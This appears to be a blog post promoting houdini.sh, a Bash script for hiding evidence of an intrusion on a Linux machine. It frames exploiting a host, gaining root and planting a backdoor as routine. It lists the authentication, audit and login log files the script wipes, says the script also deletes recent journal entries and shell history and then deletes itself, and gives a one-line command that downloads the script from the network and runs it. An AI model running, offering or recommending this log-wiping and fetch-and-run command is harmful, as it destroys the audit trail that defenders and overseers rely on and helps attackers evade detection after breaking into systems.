Did you know that professional hackers are also excellent magicians?

Generally speaking, the pattern is always the same. You will find a vulnerability, you will exploit it, then comes the part of privileges escalation. And that's it, you are root, master of the machine and as you don't have time you will install a backdoor, somewhere, well hidden, to do what you want with this new machine later. And then... You logout! The first mistake has just been made.

Why? Well, because all the actions you just perform, from the vulnerability exploitation until the moment you became root, were secretly recorded in several files on the machine. It's a bit like dropping your ID in the living room during a successful burglary, isn't that a shame?

So to avoid this kind of situation, today I'm gonna talk about houdini.sh! A Bash script that will help you to cover the traces you left on the machine, and make them disappear with a single command, like a wizard!

But what exactly does houdini.sh do?

On Linux, each action performed is recorded in a dedicated folder, usually /var/logs. Then each service have the right to have his own file inside to record any problem, very helpful to debug but not good when we want be discreet.

Here is the file that houdini.sh will clear:

/var/log/audit/audit.log # Audit TTY input

/var/log/auth.log # Authenication logs

/var/log/boot.log # System boot log

/var/log/cron.log # Crond logs

/var/log/faillog # Faillog records

/var/log/httpd # Apache access and error logs directory

/var/log/kern.log # Kernel logs

/var/log/lastlog # SSH Last Login

/var/log/lighttpd # Lighttpd access and error logs directory

/var/log/maillog # Mail server logs

/var/log/messages # General message and system related stuff

/var/log/mysqld.log # MySQL database server log file

/var/log/qmail # Qmail log directory

/var/log/secure # Authentication log

/var/log/system.log # System Log

/var/log/tallylog # Tally Log

/var/log/utmp # Login records file

/var/log/wtmp # Login records file

/var/log/yum.log # Yum command log file

But it will also delete the last 3 hours written in the journalctl because journald stores log data in a binary format instead of a plaintext format.

Another function of houdini.sh is to make sure that all commands entered during the current session SSH are also deleted.

And finally the script itself will self-destruct. Neither seen nor known!

Practical isn't it?

How to use

If the terminal is your magic wand then the incantation is the following:

wget https://gitlab.com/-/snippets/2150636/raw/main/houdini.sh && sh houdini.sh

And boom! You just disappeared and succeeded in your first magic trick 🧙

The script is open source and available on GitLab:


Use it wisely ! On that note, I'm going back to practice new magic tricks!

Thanks for reading!

Did you enjoy reading this article? You might also like this one. 3 scary tools that use Shodan search engine.